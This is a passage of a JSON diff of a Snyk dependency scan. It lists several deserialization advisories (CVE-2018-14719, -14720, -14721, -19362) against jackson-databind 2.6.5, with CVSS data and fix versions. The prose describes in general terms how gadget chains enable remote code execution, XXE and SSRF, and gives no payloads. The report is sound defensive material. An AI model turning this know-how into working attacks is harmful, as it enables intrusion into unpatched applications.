"2018-10-11T17:19:41Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:22.234808Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72449", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + 
"cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.195569Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:47:48.008907Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:33.930153Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform an XML External Entity (XXE) Injection via the `JDK` classes due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14720`) is not identical to `CVE-2018-12018`, `CVE-2018-14729`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.84205", + "probability": "0.01052", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14720" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-x2w5-5m2g-7h5m" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:21:22.141403Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:20:17Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:19:17Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:33.930153Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72450", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x", + "title": "GitHub Release Notes" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:39.120318Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.151247Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.823657Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack via the `blaze-ds-opt` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14719`) is not identical to `CVE-2018-12018`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n- [GitHub Release Notes](https://github.com/FasterXML/jackson-databind/blob/a066415d66a6b1a4688ff0ed25695aa3a86ac130/release-notes/VERSION-2.x)\n", + "epssDetails": { + "percentile": "0.85805", + "probability": "0.01269", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14719" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-4gq5-ch57-c2mg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:23:45.326350Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:22:45Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": 
"maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:22:38Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.823657Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72451", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.7)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.7" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2097", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + 
"cvssV3BaseScore": 10, + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "assigner": "Red Hat", + "severity": "medium", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "cvssV3BaseScore": 6.8, + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:20.565013Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 10, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:46:43.143163Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "medium", + "baseScore": 6.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:21.774444Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A malicious user could perform a SSRF attack via the `axis2-jaxws` gadget due to an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-14721`) is not identical to `CVE-2018-12018`, `CVE-2018-14719`, `CVE-2018-14720`, `CVE-2018-14722`,`CVE-2018-12023` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.7 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/87d29af25e82a249ea15858e2d4ecbf64091db44)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2097)\n", + "epssDetails": { + "percentile": "0.85710", + "probability": "0.01257", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-14721" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-9mxf-g3x6-wv74" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:25:40.161831Z", + "functions_new": [ + { + "version": [ + "[,2.9.7)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-07-27T17:24:46Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2018-10-11T17:24:39Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:21.774444Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72882", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Wuguixiong" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.5)", + "[2.8.0,2.8.11.3)", + "[2.9.0,2.9.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.5", + "2.8.11.3", + "2.9.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2186", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8", + "title": "GitHub Release Tag" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + 
"cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:46.690019Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:06.100058Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:51:22.043196Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attacks due to not blocking the `jboss-common-core ` class from polymorphic deserialization.\r\n\r\n**Note** This vulnerability (`CVE-2018-19362`) is not identical to `CVE-2018-19360` and `CVE-2018-19361`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.5, 2.8.11.3, 2.9.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/42912cac4753f3f718ece875e4d486f8264c2f2b)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2186)\n- [GitHub Release Tag](https://github.com/FasterXML/jackson/wiki/Jackson-Release-2.9.8)\n", + "epssDetails": { + "percentile": "0.81590", + "probability": "0.00788", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-19362" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c8hm-7hpq-7jhg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-01-03T14:17:19.256477Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-01-02T19:18:44Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
